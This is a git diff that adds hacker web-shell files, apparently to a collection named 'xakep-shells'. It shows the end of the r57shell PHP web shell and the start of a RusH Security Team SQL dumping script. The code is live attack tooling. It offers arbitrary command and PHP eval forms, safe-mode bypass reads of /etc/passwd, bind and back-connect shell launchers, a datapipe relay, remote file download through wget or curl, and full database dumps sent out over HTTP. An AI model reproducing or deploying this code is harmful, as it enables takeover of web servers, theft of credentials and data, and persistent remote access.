+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sql.php.php.txt b/xakep-shells/PHP/sql.php.php.txt
new file mode 100644
index 0000000..5e90346
--- /dev/null
+++ b/xakep-shells/PHP/sql.php.php.txt
@@ -0,0 +1,1694 @@
+<?php
+error_reporting(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@set_magic_quotes_runtime(0); //èçáàâèòüñÿ îò ñëåøåé ïðè ïîëó÷åíèè äàííûõ èç ôàéëà
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+if(!ini_GET("register_globals")){ 
+import_request_variables("GPC"); 
+}
+//Åñëè php äîáàâèë ñëåøè, èçáàâèòüñÿ îò íèõ.Ñëåøè áóäóò óäàëåíû êàê èç ãëîáàëüíûõ 
+//ìàññèâîâ, òàê è èç âñåõ ïåðåìåííûõ, êîòîðûå îáðàçóþòñÿ ïðè register_globals=on
+if (GET_magic_quotes_gpc()) strips($GLOBALS);
+function strips(&$el) { 
+  if (is_array($el)) { 
+    foreach($el as $k=>$v) { 
+      if($k!='GLOBALS') { 
+        strips($el[$k]); 
+      } 
+    } 
+  } else { 
+    $el = stripslashes($el); 
+  } 
+}
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+    $file = "C:\\tmp\\dump_".$db.".sql";
+    $p_v=$SystemRoot."\my.ini";
+    $os="win";
+} else {
+    $file = "/tmp/dump_".$db.".sql"; 
+    $p_v="/etc/passwd";
+}
+if ($HTTP_GET_VARS['send']=='send_http') {
+function download($file, $type = false, $name = false, $down = false) { 
+if(!file_exists($file)) exit; 
+if(!$name) $name = basename($file); 
+if($down) $type = "application/force-download"; 
+else if(!$type) $type = "application/download"; 
+$disp = $down ? "attachment" : "inline";
+header("Content-disposition: ".$disp."; filename=".$name); 
+header("Content-length: ".filesize($file)); 
+header("Content-type: ".$type); 
+header("Connection: close"); 
+header("Expires: 0");
+set_time_limit(0); 
+readfile($file); 
+unlink($file);
+exit; 
+} 
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if (sizeof($tabs) == 0) { 
+      // ïîëó÷àåì ñïèñîê òàáëèö áàçû 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");        
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+}
+if ($HTTP_GET_VARS['strukt']=='t_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+   fclose($fp); 
+}
+download($f_dump);
+}
+function send_header() {
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+}
+if ($HTTP_GET_VARS['img']=='st_form_bg') {
+   $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
+   send_header();
+   echo base64_decode($st_form_bg);
+}
+if ($HTTP_GET_VARS['img']=='bg_f') {
+$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
+      'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
+      'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
+   send_header();
+   echo base64_decode($bg_f);
+}
+if ($HTTP_GET_VARS['img']=='b_close') {
+$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
+         'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
+         'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
+         'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
+         'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
+         '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+         'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
+         'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
+         'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
+         'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
+         'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
+         'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
+         '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
+         'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
+         'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
+         'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
+         'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
+         'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
+         'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
+         'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
+   send_header();
+   echo base64_decode($b_close);
+} 
+$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
+$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Îøèáêà â çàïðîñå:</b><tr><td align=center><br><h5>";
+$f_error="</h5></td></tr></table>
+<CENTER><FORM><INPUT type=\"button\" value=\"   << Íàçàä    \" onClick=\"history.go(-1)\"><BR>
+</FORM></CENTER>
+</td></tr></table></td></tr></table>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
